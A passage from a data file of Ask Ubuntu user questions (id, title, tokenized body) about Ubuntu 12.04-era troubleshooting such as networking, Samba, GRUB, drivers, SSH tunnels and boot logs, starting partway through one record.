13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : od failed with 2 proto=ntlmv2 jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : user=macbookair-fd34\sandfox jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request kdc : ok user=macbookair-fd34\sandfox proto=ntlmv2 flags : jul 31 13:33:37 jamess-macbook-air.local smbd [ 49120 ] : macbookair-fd34\sandfox connected to path /var/rpc/ncacn_np i realise this early days for problems with osx but does anyone have any clues ? if you need more information , let me know .
170420	why does n't this custom static ip network configuration work ?	i installed ubuntu server 12.04 . i configured my network like this : auto eth0 iface eth0 inet static address 121.127.36.164 netmask 255.255.255.0 network 121.127.36.0 broadcast 121.127.36.255 gateway 121.127.36.1 dns-nameservers 208.67.222.222 208.67.220.220 with these configurations , i can not connect to internet . whenever i do ping www.google.com it just waits . when i do ping 77.245.149.23 or any other ip , it returns unreachable host error . could you please help me fix this error ? edit : i can ping the ip from my network . my modem is set to dhcp enabled dynamic ip . edit 2 : sorry for my late explanations , but i must firstly explain the scenario : there is a company with 20 staff . i developed a web application with php/codeigniter for them . where they want to use it inside their local network . i install an ubuntu server 12.04 , and want to make it a local server for this purpose . i need to assign a static ip address for this server , where it musnt changed . i have a tp-link wireless router , where the internet connection is provided through this router . it is dhcp enabled . now for this , what i need ? how i must configure my server ?
170422	can i integrate the gmail ubuntu webapp with a google apps domain ?	i am trying out the webapp integration feature in ubuntu at the moment and am having trouble with the integration of gmail as a webapp using my google apps account . when i sign into my personal gmail account in chromium i get the pop-up bar that asks if i want to integrate it , i did n't say yes , i 've just ignored it as this is my work pc . however when i visit my google apps gmail account the pop up does not appear asking me to integrate . i have successfully visited google calendar and google plus and got them integrated using my google apps account so why is the gmail element not asking on my apps account ?
170430	windowsxp guest os runs only when its virtual hdd is in the home folder of ubuntu	i am into a weird problem . i have installed virtualbox in my precise pangolin in my laptop . my system contains two partitions . lets presume that they are partition a and partition b. partition a contains ubuntu . tried to install windows xp as a guest operating system in my precise pangolin . but i couldnt install . windows xp threw an error message while installing , stating that the files can not be copied onto the harddisk . this scenario happens , when i have my virtual hard disk for windowsxp guest inside partion b . but when i have the virtual hard disk inside my home folder in ubuntu , it is running fine . could any one please help me resolve this issue ? any help would be highly appreciated . regards , hari
170431	folder with images in makefile	i have been using anjuta to make some programs . i have made a folder in the src directory of the program to store all the images and icons . ( /src/images/icons ) however when i build the tarball the folder does not exist in the compressed file , so i guess i have to include it in my makefile . how can i edit the makefile so that the images are included ?
170437	is /home/userdir or entire /home directory encrypted when selecting encryption during installation ?	my question : when selecting encryption during the installation of ubuntu 12.04 : is everything in /home encrypted or just the home-directory of the user who did the installation ? specifically , i enabled the encryption of my home-directory during the installation . now i need a directory ( let 's name it 'outside ' ) where no encryption will be active for maximum harddisk-performance ( audio-recording ) . would it be sufficient to 'mkdir /home/outside ' , or better 'mkdir /outside ' ( followed by appropiate chown and chmod ) ?
170439	is there a way to connect to a local pc via a gateway without having the gateway shine through ?	when i 'm at work i can use nautilus to navigate files on other computers of the local network comfortably . nautilus mounts the other computers file systems using ssh ( sftp via gvfs ) . however when i 'm at home i need to connect to a gateway ( via ssh ) server for security reasons . from there i can ssh into the local computers . this breaks nautilus ability to browse the files as i can just see the gateway and there is no direct sftp link i could use in nautilus . how can i use nautilus to browse files on machines of my work 's local network from home ? how do i need to configure the gateway to make that possible ( if it 's possible at all ) ? to make thinks worse i only have user ( not root ) priviliges on the gateway . i strongly suspect there is no solution outside having our sys-admin installing a vpn , but au has supprised me with clever solutions in the past . edit : it was suggested to run nautilus on my work computer . i did so using x-forwading : ssh -t -c -x gateway ssh -t -x me @ workpc nautilus . unfortunately i get an error that says `` nautilus can not handle sftp locations . '' even if x-forwarding worked properly it would have to distinct disadvantages : slow responding gui no drag and drop of files to my local ( =home ) machine so still looking for a better solution . is there no such thing as ssh forwarding , so that the gateway just pushes all ssh requests to my work-pc ?
170440	firestarter exits after closing	i 'm using firestarter on ubuntu 12.04 . i configured firestarter to run even after closing in the preferences menu . but still it exits after closing . it does n't minimize to system tray .
170452	driver problems with nvidea geforce go 6600 on ubuntu 12.04	i have install ubuntu 12.04 in my computer and i want to know , what is the best driver for the video card nvidia geforce go 6600 ?
170454	can i install ubuntu to my 32 gb usb pen drive ?	i want to install ubuntu like how you would to a hard drive so i can use it as a portable system . i do not want a live install ; i want something where i can install updates , install drivers , and things like that . i 'm really confused because i made a persistent install using unetbootin in windows thinking that would allow me to do that and yet when i booted i still saw the `` install ubuntu 12.04 lts '' icon .
170458	grub menu redundancy	recently i installed ubuntu using wubi on my desktop . i already had windows xp and linux mint in dual-boot , with the grub menu presenting the entries for both os . now that i 've installed ubuntu using wubi , the original grub menu is intact , which was expected , because wubi makes an entry on windows boot menu . so i choose windows xp from the original grub menu , then it displays the windows boot menu , featuring windows xp and ubuntu . if i choose windows xp , windows is loaded , however if i choose ubuntu , yet another grub menu comes up , with all three options there - windows xp , linux mint and ubuntu . this is a bit unnecessary and redundant . originally , i was expecting to have the original grub and then windows boot menu , now that there is a second grub , i am afraid i might have some boot problem when i uninstall ubuntu from windows . how should i proceed to keep only one of the grub menus , without compromising the possibility to boot into any of the os ?
170464	how do i configure apache to run multiple instances ?	specifically , i have two httpd.conf files : /etc/apache2/httpd.conf /etc/apache2/httpd_2.conf how should i modify the /etc/init.d/apache2 script so that instances of apache will be invoked for both configurations ? the apache2 script is currently standard/unmodified .
170466	how do i restrict access to a directory for a specific user through samba ?	i have got a sub directory of a shared directory that i use samba with and have set it to be accessible by only one user : $ cd /mnt/somesambashare $ ls -lad somedir drwx -- s -- - 23 someuser somegroup 4096 2012-07-26 07:44 somedir i can not access this directory as a linux user other than someuser . but i still can access this directory using a different samba user than someuser . why is that ? and how do i prevent this ?
170468	how can i remove icon of uninstalled application from application lens in dash ?	i installed cardapio and its icon was in launcher as well in application lens in dash . when i unistalled cardapio , its icon vanished from the launcher ( as it should ) but the icon is still present in application lens in dash . is there a way to get rid of it ?
170471	how do i record the nasa hd tv feed ?	i have been trying to figure out a way to record nasatv hd live feed/broadcast but it seems to be harder than i envisioned . anybody with enlightened suggestions ? i am in the dark ...
170480	windows wubi installer and windows 8	i want to dual boot windows 8 consumer preview and ubuntu using wubi , but i 'm a bit confused . do i need to partition my drive as for a installation drive ? it shows me drive c 198 gb , which is my main drive that has windows on it . do i pick that drive ? and is it possible to use wubi in windows 8 cp without problems ?
170483	install ubuntu from usb when there is only win 8 on computer	now there is only single win8 os on my laptop . how i create usb with ubuntu installer , but after reboot win 8 with sytem repair and nothing ubout ubuntu installation . i have cheked bios settings : usb is first . ps i want to repalce win 8 by ubuntu
170486	`` malformed line 6 '' error in my /etc/apt/sources.list	i 'm new to ubuntu so i do n't really know much yet . i encountered this problem while on the terminal : e : malformed line 6 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . what should i do ? help would be much appreciated . here 's my source.list : # /etc/apt/sources.list deb http : //archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //archive.canonical.com/ partner deb-src http : //archive.canonical.com/ partner /etc/apt/sources.list
170492	how do i install an edimax ew-7811un wireless adapter ?	i recently installed ubuntu 12.04 to my old computer ( a dell ) after xp began to run very slow , and am now trying to install a edimax ew-7811un 150 mbps wireless 11n nano size usb adapter to connect to my wifi . when i put the driver disk in , an error message comes up saying it can not find the autorun program . i am new to using this os and am entirely lost . how can i get the driver installed ? thanks !
170497	what options are available for c++ gui development with ubuntu ?	i know about qt as an c++ software development framework for front end applications and i am aware of eclipse as an ide for java and c++ , but i was wondering if anyone could provide recommendations of any other ide that allows rapid gui application development on ubuntu . to date all of my ubuntu side development has been command line based and so makefiles and eclipse have been sufficient . now i need to write a gui app to run on ubuntu and would welcome any suggestions of a good tool to do so . many thanks
170498	movies lag in full screen , although flash works fine	i have an alienware m11x r2 computer running ubuntu 12.04 ( 64 bit ) with nvidia drivers and bumblebee for optimus technology . the problem that i have is that if i play a video in full screen it lags , not really bad but enough to notice the lag and for me to get get frustrated . however , flash works fine ; my problem lies with mp4 , mkv , and other formats like these . i have tried the default ubuntu applications and others and they all have the same problems with video playback . everything works fine on ubuntu except this and i do n't know how i can fix this . this is how i installed bumblebee and nvidia drivers : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia if anyone could help it would be very much appreciated .
170499	can i arrange the files in a folder by the method `` group according to type '' in nautilus ?	in windows , you have an option to group the files according to type in which for example all .txt files are displayed under text files and .exe files under exe or .obj under obj . i mean all the files of the same extension / type are displayed under the respective groups . so can i do this in nautilus ?
170502	using evolution in ubuntu comes up with this error when i send mail	the reported error was '' failed to append to mbox : ///home/ralph/.local/share/evolution/mail/local # sent : invalid folder uri 'mbox : ///home/ralph/.local/share/evolution/mail/local # sent' appending to local 'sent ' folder instead . `` .
170505	no virtualbox.so file while running vbox	i am trying to run haikuos in virtualbox , but when i try to run it via synapse , nothing happens and when i try to run it via the terminal , i get the following error : supr3hardenedmaingettrustedmain : dlopen ( `` /usr/lib/virtualbox/virtualbox.so '' , ) failed : libgl.so.1 : can not open shared object file : no such file or directory . i have tried installing from terminal , a .deb package from oracle , and the synaptic package manager . are there any ways to fix it ?
170506	recording the radio streaming of radiotray or rhythmbox	i have checked the other questions before asking this one . i am using radiotray for the streaming and wish to record the streams of di.fm . i tried the trick with pulseaudio volume settings for recording and radiotray does n't show up there . i am using 12.04 ubuntu . is there any way for recording from say rhythmbox with some plugin or radiotray with any other method ?
170513	512 mb ram enough for lubuntu with ubuntu apps ?	i 've got a pc that i 'd like to install lubuntu on . i use ubuntu on my main pc and i 'm used to the apps that it ships with - office and mail client is what i use most . so will lubuntu really be faster on my system if i use libreoffice and thunderbird instead of the lighter weight apps ?
170516	nautilus action help - adding context menu in nautilus	i was searching to add emblems support back in ubuntu 12.04 and found this . i also have installed nautilus config tool . there the site says : installation and config copy content of release folder to any location you like , e.g . to /home/user/opt/nautilus-emblems/ . then create custom context menu entry with nautilus-actions , and point it to emblems.sh script , passing selected file / folder as a parameter , e.g . : command : /home/user/opt/nautilus-emblems/emblems.sh parameters : % f script emblems.sh exports language environment variable to set proper locale for an app . it is set to russian by default , but you may set export language=en_en : en to use english instead . other languages are n't included by now . i done that and also got a context menu . but when i click on it noting happens ! please help !
170523	why does my battery drains fast with ubuntu in sleep more ?	i have an asus eee pc 1005ha netbook dual booting ubuntu and windows 7 . when i close the lid in either os the laptop will go to sleep . if i do this in ubuntu and come back to the computer a few days later the battery will be completely drained . if i do it in windows then the netbook will eventually hibernate and the battery will be fine . any ideas what i can do to fix the battery drain problem ?
170526	wlan-card named 'eth1 ' ?	my wlan-card is named as 'eth1 ' . last week it was wlan0 and now it turned to eth . i do n't know why and do n't know how to change this . how can i change this back ?
170529	literal dot confusion , copy all hidden files	it works fine when i copy all hidden files using regex : cp -r source/\. [ ^ . ] * destination/ and it just copies exactly files beggining with a dot . . however , i found the following works also : cp -r source/. [ ^ . ] * destination/ in regular expression , does n't dot . mean `` any singular character '' ? so why does not the second command copy regular files ( those not hidden ) ? why is the dot . interpreted literally in cp command ?
170530	how do i set nautilus to default view ?	using ubuntu 12.04 64-bit system . after playing around the viewing settings for a while i ended up with view like this under default view the name should be under the icon . even after selecting the reset view to defaults and following this solutions listed here did n't work out . how do i reset nautilus to the default configuration ? ( solutions to this answers did n't worked for me , tried removing config files & then doing a re-installation of nautilus changed nothing ) nautilus default view only ( this question was closed referencing to natty bug report , please do n't close this question ) all kind of solutions ( workarounds i mean ) are welcomed ( just do n't suggest changing nautilus to something else ) . i already tried changing the viewing options under preferences menu with no success .
170531	how can i get notification when my laptop battery gets fully charged ?	sometimes my charger remains plugged into laptop even after charging is complete . is there a way to get a pop-up message/notification when my battery gets full due to charging or is there any software/package which can provide the functionality ?
170533	intel wifi is n't working after upgrading to kernel 3.5	after installing kernel upgrade from 3.2 to 3.5 wifi does not work . i have intel wireless . wireless adapter is n't shown in network settings . how can i enable wifi ?
170538	why does uninstalling bootchart makes lubuntu slower ?	i have lubuntu 12.04 on my toshiba netbook nb205 : atom cpu , 2gb ram ... it runs nice except it boots really slow ~ 3 minutes . when i install bootchart + pybootchartgui to see what going on , the boot time suddenly improves amazingly - it boots up in ~ 1 minute . the problem is if i disable bootchart ( grub_cmdline_linux_default= '' quiet splash bootchart=disable '' ) or uninstall bootchart + pybootchartgui , my lubuntu goes back to its slow boot of 3 minutes again . can anyone educate me on this ? thanks !
170544	installing ubuntu 12.04 freezes when running âgrub-install dummyâ	when installing ubuntu 12.04 server from a disc , my system freezes up after the installation comes to installing grub boot loader . i 'm installing from scratch , no partitions or os is on this computer . this is where it hangs : running `` grub-install dummy '' here 's my syslog file : http : //paste.ubuntu.com/1122029/ and here 's the specs for the computer : general spec model : ts-0002qc-amdx203 processor : amd dual core e-450 1.65ghz memory : 2gb hard drive : 500gb any help would be great !
170549	monitor disk activity on a per file basis	i am trying to find a program that actively monitors how much data is read and written per second to open files and then sorts files with the highest usage at the top . this would be similar to iotop but on a per-file basis instead of per-thread or per-process . it would also be identical to the disk tab in windows 7 resource monitor . any suggestions ? thanks
170551	how do i get the netgear n150 usb wifi adapter working on 12.04 ?	just installed latest version of ubuntu . i 'm using a netgear n150 wireless usb micro adapter wna1000m which keeps asking for network password over and over . i read elsewhere that i needed to install the latest driver for my chipset ( rtl8188cus ) which i have and still no joy . if i run the steps listed in this thread while connected through ethernet , the wireless will connect just fine . if i disconnect the ethernet , the wifi will even continue to work , but after a restart or two i will lose connection . if i repeat the steps listed in the aforementioned thread , it will not re-connect wifi unless i run those steps while connected to ethernet ... ... .so strange ...
170562	removing all traces of nvidia drivers	changed my hardware from nvidia to amd in pc pretty much for gaming on my windows install . but now i have booted back into ubuntu and its taking a hissy fit at the change of hardware . i want to remove all types of drivers , x11 configs , everything . then start from scratch . i have been un-installing and reinstalling drivers for past couple of days with no luck of getting catalyst running successfully . any help would be great thanks alot . bill
170569	how do i re-install 11.10 and wipe out 12.04 ?	i have had nothing but problems with 12.04 and want to return to 11.04 . i do not want to try to fix it at this time and want to go back to what worked well for me . can someone point me to the appropriate iso download for 11,10 and instructions i need to re-install it on my dell inspiron mini . i will be using a microsoft windows 7 to download 11.10 onto a thumb drive . am i right to assume by doing this i will have no issues ?
170575	is there a way to change the speed of a cpu fan ?	i got a more powerful cpu and can see from the system load applet that whenever the cpu has got some work , the fan turns up very much . it 's much louder than before even if the cpu was working hard . when usage is low it 's nice and quiet again . is there a way to influence the speed ?
170580	how to set a shortcut for each application in gnome 3 ?	is it possible to use a shortcut for each application in gnome3 ? for instance , in unity i use super-1 for the first application in laucher , super-2 for the second one and so on . edit the alternative solution i found was to use each application in a separate workspace and set a shortcut for each workspace using using dconf-editor org.gnome.desktop.wm.keybindings .
170581	autossh for a robust tunnel	i 'm trying to start an ssh tunnel from a to b and have it run despite things like : period network/wifi drops on a and remote server reboot on b . my ssh tunnel starts using upstart script on a with event start on ( net-device-up iface=eth0 ) i 've found autossh which is supposed to handle these kinds of things , but had some trouble getting it to work . the upstart executes : autossh -m 0 -2qtn -o `` serveraliveinterval 30 '' -o `` serveralivecountmax 2 '' -l 5678 : somehost:5678 user @ b however when i log into b and kill -9 that tunnel session , autossh just exits with `` connection to b closed by remote host . '' that 's not what i expected autossh to do . any advice on how to set this up ? any gui service monitoring utilities out there that essentially display a green light if a service is up ? thanks .
170582	installing desktop environments	i am not sure if it is safe to install more desktop environments . what versions are safe ? i would like to have gnome and kde on ubuntu . last time i installed gnome-full has broken my login screen and it was not ubuntu login screen anymore . it was like gnome login that i saw in debian .
170585	unity doesnt work after activating the sky cube in cssm	i was trying to activate the sky cube in compiz . closed the program and rebooted now i only get the desktop screen with no icons . i ca n't seem to be able to get anywhere with hot keys either . nothing seems to be working . tried to reboot in safe mode but the command line always indicates some sort of error and the repairs stop .
170588	implementation of a slider on appindicator	i 'm trying to add a slider to an indicator to port my gnome-shell extension to unity . i found out this question which is exactly my problem . if this is not possible using libido and indicator how is the sound indicator implemented ?
170592	ubuntu 12.4 running extremely slow	i just finished installing ubuntu 12.4 on my pc . however , after the installation , it has been running surprisingly slow . when , i say slow i mean , the launch of applications takes around 2-3 minutes . on top of that , the computer is freezing-up every 5-7 minutes with application ux turning gray . here are the specs of my pc . it is a packard bell easynote . intel core i7-620m processor 4 gb memory nvdia geforce gt 320m , 1 gb vram 640 gb hdd did anyone else have this issue ? any suggestions on how i can fix this ?
170597	installed 12.04 , now case fans do n't work	so i installed ubuntu 12.04 and now my case fans never run , even when booted into windows 7 . the only fans that ever come on are fans directly attached to a device ( i.e . cpu/gpu/psu ) . anything on a molex connector never spins up . has anyone seen this ? i 've tried reseting my bios to defaults but that did n't do anything . i guess grub is the only common denominator between linux/windows ? my case fans used to come on the second i hit the power on , though , which is pre grub .
170599	u1sync : error : -- oauth requires a key and secret together in the form key : secret	i run ubuntu 12.04 on a headless server . i 've set up an ubuntu one account . i have installed ubuntuone-sso-login.py and generated a key with it . i have run : u1sync -- init -- oauth= [ here i 've put the key with cut and past from the step before ] [ directory name ] and i always get this error message : u1sync : error : -- oauth requires a key and secret together in the form key : secret what have i done wrong ?
170600	macbook air 3.1 ubuntu 12.04 wo n't suspend when closing lid , after installing nvidia driver	i just installed ubuntu 12.04 on my macbook air i had a small graphic problem described here : recent lcd trouble with 12.04 on 2010 macbook air 11 ( 3,1 ) . so i followed the answer and installed the latest nvidia driver , but now my air wo n't suspend when closing lid , but it does work if i suspend manually .
170603	how to use ubuntu entirely in swedish ?	just installed 12.04 and when installing i choose my native language ( swedish ) , but not everything is written in swedish . for example : `` create new folder '' , `` home folder '' , `` system settings '' and so on . how do i make it entirely swedish ?
170604	option to merge webapps icons into one launcher icon	i activated the webapps ppa that enables me to have web pages integrated into ubuntu but since i use several today i noticed my launcher had a lot of icons now . for example i have facebook , launchpad , grooveshark , gmailm linkedin an others . is there a way to gather them all in one icon that i can right click or left click and see each one in a menu ?
170605	how to search for files with a specific permission	how can i search for files that have a specific permission . for example , i have 10000 files and i want to find the ones that have the read only flag . in another case i want to search for another that has a particular owner . or in another to see the files that are read only and executable .
170607	dual boot ubuntu and windows 7 ?	i 'm trying to set up a dual boot lenovo ideapad that came with windows 7 . lenovo uses up 4 partitions out of the box . they are : ( unnamed ) 14gb lenovo d : 30gb system_drv 200mb window7_os c : 400gb i have no idea what the first 3 do . ideally , i could shrink the windows7_os partition ( down to , say , 100gb ) and then install ubuntu on extended partitions created in the freed space . the first sticking point is that i ca n't resize ntfs partitions from gparted . the problem has been encountered before in other threads : how can i resize ntfs partition in gparted ? . i have tried everything there with no luck . i also can not seem to resize the windows partition from windows . the `` virtual disk manager '' keeps throwing a cryptic `` the parameter is incorrect . '' error when i try . i do n't know what to do about that . i tried using : ntfsresize -s100gb -f -b /dev/sdb2 ( /dev/sbd2 is the windows7_os partition ) after that operation , the `` virtual disk manager '' in windows sees a 400gb `` volume '' with 100gb of capacity . while it appears that i have succeeded in taking away space from windows , resizing from either os is still not successful for the same reasons as before . disabling `` virtual memory '' in windows does not fix my problems . neither does running `` chkdsk \r '' or `` chkdsk \f '' several times . i also defragged from windows with no luck . what can i do ? my best current guess : make a windows 7 install disc ( how ? ) , wipe clean the hard drive ( it 's a new computer ) , install ubuntu , create an extra partition , install windows on that ( which i assume will somehow leave the partition table alone ) , then reinstall grub ( or maybe all of ubuntu ) to get over the mbr problem .
170608	how to use overlay scrollbars for large scrolling areas ?	i sometimes open large files with dozens of pages of text in them . however , often i find that i drag the overlay scrollbar to the top or to the bottom of the window , but i am nowhere near the beginning or the end of the document . currently to finish scrolling i either : a ) click the scroll button 50 times to go page by page . b ) drop the scrollbar , move my mouse towards the bottom of the scrollbar and click and rescroll i am really getting annoyed with this ! is something i am doing wrong ? is there another way to make it work just like regular scrollbars where you grab the elevator and drag to where you want to be ?
170610	how can i make a script run at a standard time interval	my end goal is to get a notification when my isp dynamic ip address changes . i 'm using curl -o icanhazip.com ( file ) to write the ip address to a text file , and i 'd like to write a script to make the get request and compare it with a file , update it and send me a notification if there 'd been a change . the script has to be run automatically at a given time interval , like once a day . how do i get the script to run like that .
170616	for how long 12.04 lts will be supported ? 5 or 3 years ?	hey everyone today my friend call me and he told me that 12.04lts it will be support for 3 years is that correct ? because i think it will be supported for 5 years , i am not sure but i heard from different person told me that 12.04 will be supported for 5 , so please someone tell me 5 or 3 years ? i am speaking about desktop not server version thanks
170628	no sound / choppy sound creative hd titanium & 12.04 lts	i 'm new to ubuntu , i set up my double boot three days ago ! i managed to figure everything out except for the sound . i 'm using a sound blaster x-fi titanium hd . i typed the command that allowed me to select analog devices in the sound properties . i see the name of my sound card but when i do the tests ( `` front left - front right '' ) i only hear one word out of the two or nothing at all . i know i probably need to copy/paste some info from my system so that you can help me . i just do n't know what you need ! please let me know and i 'll post it asap . thanks !
170630	what are these `` unknown key 'bus ' '' errors during boot ?	i 'm trying to optimize the boot process on my ubuntu 12.04 laptop , and while analyzing the /var/log/boot.log file i found many unknown key 'bus ' ... . how can i get rid of them ? here 's the relevant part of boot.log : udevd [ 358 ] : unknown key 'bus ' in /lib/udev/rules.d/10-blackberry.rules:21 udevd [ 358 ] : invalid rule '/lib/udev/rules.d/10-blackberry.rules:21' udevd [ 358 ] : unknown key 'bus ' in /lib/udev/rules.d/10-blackberry.rules:23 udevd [ 358 ] : invalid rule '/lib/udev/rules.d/10-blackberry.rules:23' udevd [ 358 ] : unknown key 'bus ' in /lib/udev/rules.d/10-blackberry.rules:29 udevd [ 358 ] : invalid rule '/lib/udev/rules.d/10-blackberry.rules:29' udevd [ 358 ] : unknown key 'bus ' in /lib/udev/rules.d/10-blackberry.rules:30 udevd [ 358 ] : invalid rule '/lib/udev/rules.d/10-blackberry.rules:30' udevd [ 358 ] : unknown key 'bus ' in /lib/udev/rules.d/10-blackberry.rules:31 udevd [ 358 ] : invalid rule '/lib/udev/rules.d/10-blackberry.rules:31' udevd [ 358 ] : unknown key 'bus ' in /lib/udev/rules.d/10-blackberry.rules:33 udevd [ 358 ] : invalid rule '/lib/udev/rules.d/10-blackberry.rules:33' udevd [ 358 ] : unknown key 'bus ' in /lib/udev/rules.d/10-blackberry.rules:34 udevd [ 358 ] : invalid rule '/lib/udev/rules.d/10-blackberry.rules:34' udevd [ 358 ] : unknown key 'bus ' in /lib/udev/rules.d/10-blackberry.rules:35 udevd [ 358 ] : invalid rule '/lib/udev/rules.d/10-blackberry.rules:35' udevd [ 358 ] : unknown key 'sysfs { idvendor } ' in /etc/udev/rules.d/15-huawei.rules:3 udevd [ 358 ] : invalid rule '/etc/udev/rules.d/15-huawei.rules:3' udevd [ 358 ] : unknown key 'sysfs { idproduct } ' in /etc/udev/rules.d/15-huawei.rules:4 udevd [ 358 ] : invalid rule '/etc/udev/rules.d/15-huawei.rules:4' udevd [ 358 ] : unknown key 'sysfs { idproduct } ' in /etc/udev/rules.d/15-huawei.rules:7 udevd [ 358 ] : invalid rule '/etc/udev/rules.d/15-huawei.rules:7' p.s . : on this machine i firstly installed ubuntu 9.04 , then it was upgraded all ubuntu versions up to 12.04 . now i 'm using xubuntu-desktop as desktop .
170633	how can i edit the color of this button using a gtk theme ?	here is a screenshot of my current theme -- everything works but two things . edit : i deleted the picture -- thunderbird had information that was probably not best to show online . basically , the interface buttons for nautilus were a different color than that of thunderbird . look at my nautilus menu : i was able to change its color by editing button_bg_color in the gtk.css file . however , look at the thunderbird interface 's buttons -- they are not the same color . some programs have the color from the nautilus interface for buttons , while some have thunderbird 's . ( these programs are selected randomly to show the differences . ) how can i change that ? also , does anyone know how i can set different applications to use different themes or different parameters ? things like libreoffice and evolution ( my actual email client ) are unreadable with my theme
170634	macbook pro 8,1 ubuntu 12.04 sd card reader doesnt work	the built in sd card reader on the macbook pro 8,1 ( 2011 , early or mid i think ) doesnt work at all . however i read here ... . https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/801034 that someone plugged in ethernet and it works . how the hell does that make a difference ? there has to be some kind of better workaround ? i take my laptop on the go , thats why i bought a laptop . i dont want to be tethered down . please help ?
170635	how to change where nautilus mounts network drives ( ubuntu 12.04 32-bit )	when i mount a samba network share in nautilus it is mounted under ~/.gvfs i would like to change this default so that all network shares mounted using nautilus are mounted under /mnt for example . how would i go about doing this ?
170636	analyse disk usage ignoring mounts	ubuntu is complaining that my root file system is nearly full , but when i use baobab ( aka `` disk usage analyser '' ) or du -h it summarises the usage of all the other mounted file systems as well . how can i exclude the other file systems which are mounted in assorted subdirectories ?
170637	system freezing constantly ; almost every time when starting a java program	i 've a brand new i7-3770 with 8gb ram machine with a fresh installation of ubuntu 12.04 . as soon as i finished installing i realized the system was freezing often . after digging a little on some forumns , i switched to kernel 3.3.6-030306-generic ( it was 3.2.0-23 ) , which did reduced the frequency of freezes , but has n't eliminated it . btw : i have a windows 7 boot , and the machine runs very well on it == > so i discarded any hardware problems most of the freezes ( but not all of them ) occurs when i start a java proccess , like eclipse or vuze . almost every time i start a java process i get a freeze tough . any help will be much aprreciated . ps : i do n't have any expirience in debugging problems like this , please guide me in how to obtain the necessary info and logs . logs : java : java version `` 1.7.0_05 '' java ( tm ) se runtime environment ( build 1.7.0_05-b06 ) java hotspot ( tm ) 64-bit server vm ( build 23.1-b03 , mixed mode ) here 's a copy of /var/log/kern.log reporting the freezing moment : ( seems hw , but ok on windows 7 ) jul 31 21:20:35 ubuntu kernel : [ 380.779998 ] ata1 : lost interrupt ( status 0x50 ) jul 31 21:20:35 ubuntu kernel : [ 380.780017 ] ata1.00 : exception emask 0x10 sact 0x0 serr 0x40d0002 action 0xe frozen jul 31 21:20:35 ubuntu kernel : [ 380.780028 ] ata1.00 : serror : { recovcomm phyrdychg commwake 10b8b devexch } jul 31 21:20:35 ubuntu kernel : [ 380.780030 ] ata1.00 : failed command : read dma jul 31 21:20:35 ubuntu kernel : [ 380.780033 ] ata1.00 : cmd c8/00:00:28:55 : ec/00:00:00:00:00/e5 tag 0 dma 131072 in jul 31 21:20:35 ubuntu kernel : [ 380.780034 ] res 40/00:00:00:4f : c2/00:00:00:00:00/40 emask 0x14 ( ata bus error ) jul 31 21:20:35 ubuntu kernel : [ 380.780035 ] ata1.00 : status : { drdy } jul 31 21:20:35 ubuntu kernel : [ 380.780042 ] ata1.00 : hard resetting link jul 31 21:20:36 ubuntu kernel : [ 381.501535 ] ata1.01 : hard resetting link jul 31 21:20:37 ubuntu kernel : [ 382.526103 ] ata1.01 : failed to resume link ( scontrol 0 ) jul 31 21:20:37 ubuntu kernel : [ 382.681602 ] ata1.00 : sata link up 3.0 gbps ( sstatus 123 scontrol 320 ) jul 31 21:20:37 ubuntu kernel : [ 382.681613 ] ata1.01 : sata link down ( sstatus 0 scontrol 0 ) jul 31 21:20:37 ubuntu kernel : [ 382.729792 ] ata1.00 : configured for udma/133 jul 31 21:20:37 ubuntu kernel : [ 382.730009 ] ata1.00 : device reported invalid chs sector 0 jul 31 21:20:37 ubuntu kernel : [ 382.730018 ] ata1 : eh complete jul 31 21:21:54 ubuntu kernel : [ 459.524738 ] ata1 : lost interrupt ( status 0x50 ) jul 31 21:21:54 ubuntu kernel : [ 459.524756 ] ata1.00 : exception emask 0x10 sact 0x0 serr 0x40d0002 action 0xe frozen jul 31 21:21:54 ubuntu kernel : [ 459.524759 ] ata1.00 : serror : { recovcomm phyrdychg commwake 10b8b devexch } jul 31 21:21:54 ubuntu kernel : [ 459.524761 ] ata1.00 : failed command : read dma jul 31 21:21:54 ubuntu kernel : [ 459.524764 ] ata1.00 : cmd c8/00 : d0:60:56:26/00:00:00:00:00/e6 tag 0 dma 106496 in jul 31 21:21:54 ubuntu kernel : [ 459.524765 ] res 40/00:00:00:4f : c2/00:00:00:00:00/40 emask 0x14 ( ata bus error ) jul 31 21:21:54 ubuntu kernel : [ 459.524766 ] ata1.00 : status : { drdy } jul 31 21:21:54 ubuntu kernel : [ 459.524773 ] ata1.00 : hard resetting link jul 31 21:21:55 ubuntu kernel : [ 460.246699 ] ata1.01 : hard resetting link jul 31 21:21:56 ubuntu kernel : [ 461.271757 ] ata1.01 : failed to resume link ( scontrol 0 ) jul 31 21:21:56 ubuntu kernel : [ 461.427342 ] ata1.00 : sata link up 3.0 gbps ( sstatus 123 scontrol 320 ) jul 31 21:21:56 ubuntu kernel : [ 461.427357 ] ata1.01 : sata link down ( sstatus 0 scontrol 0 ) jul 31 21:21:56 ubuntu kernel : [ 461.475625 ] ata1.00 : configured for udma/133 jul 31 21:21:56 ubuntu kernel : [ 461.475878 ] ata1.00 : device reported invalid chs sector 0 jul 31 21:21:56 ubuntu kernel : [ 461.475884 ] ata1 : eh complete
170639	toshiba satellite l645d screen brightness does not work onubuntu 12.04	i 've installed ubuntu 12.04 on my toshiba satellite l645d and the screen brightness does not work , any suggestions ? ? ? please help ! !
170640	how to disable apache2 server from auto starting upon boot up	i was wondering how can i disable the apache2 server from running upon boot up ? i ca n't seem to find an option which disables it to auto start when i turn on the machine .
170646	grub rescue please help	like a dummy i deleted the ubuntu partition on my hdd and restarted my computer . now when it boots up i get error : no such partition grub rescue > i do n't have a asus repair disk nor a ubuntu disk i 'm using my iphone as i do n't have anything else . am i screwed or is there a fix ?
170647	file permissions on mounted device wo n't change	i have a external hard drive , and i ca n't change the permissions of one of my folders on it . if i try to change the permissions in folder properties , nothing happens . it 's like it is conflicting with something . it says i 'm the owner of the folder i even tried going sudo chmod o+w foldername and that did n't work , it does n't change anything what is going on thanks
